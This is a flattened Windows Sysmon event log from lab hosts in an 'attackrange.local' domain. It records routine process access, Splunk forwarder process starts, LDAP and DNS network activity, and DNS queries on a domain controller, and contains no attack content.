09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CDC-6151-6F00-00000000FD01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CDC-6151-6F00-00000000FD01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.953{5EBD8912-8CDC-6151-6F00-00000000FD01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980629Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:29.931{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF803F930A7B25B7B61AB4CF603C60FF,SHA256=D5E31FEDFB6DC01CEDE789F3AC13B463BB852DFEA44CA720C468DB743373035B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980628Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:29.290{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBF2279EEA114D37E2EC318A6DEF1A3A,SHA256=0DE79CF8AAE1A293EB8FDC9A105ED34105EBB8A014962F49E7693720BDFE2FFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980627Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:29.149{69CF5F33-8CDC-6151-047A-00000000FD01}33402560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CDE-6151-7100-00000000FD01}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CDE-6151-7100-00000000FD01}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.909{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CDE-6151-7100-00000000FD01}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.734{5EBD8912-8CDE-6151-7100-00000000FD01}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.576{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49702-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.576{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49702-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.575{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49701-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.575{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49701-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.572{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49700-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.572{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49700-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.441{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49699-false10.0.1.12-8000- 354300x80000000000000001054329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.416{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54786- 354300x80000000000000001054328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.954{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49698-false10.0.1.12-8000- 354300x80000000000000001054327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.783{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-59752- 354300x80000000000000001054326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.507{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61544- 22542200x80000000000000001054325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.581{5EBD8912-8CBD-6151-0B00-00000000FD01}640_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000001054324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.427{5EBD8912-8CC0-6151-1000-00000000FD01}440wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000001054323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:28.947{5EBD8912-8CDC-6151-6E00-00000000FD01}2608win-dc-4290fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Program 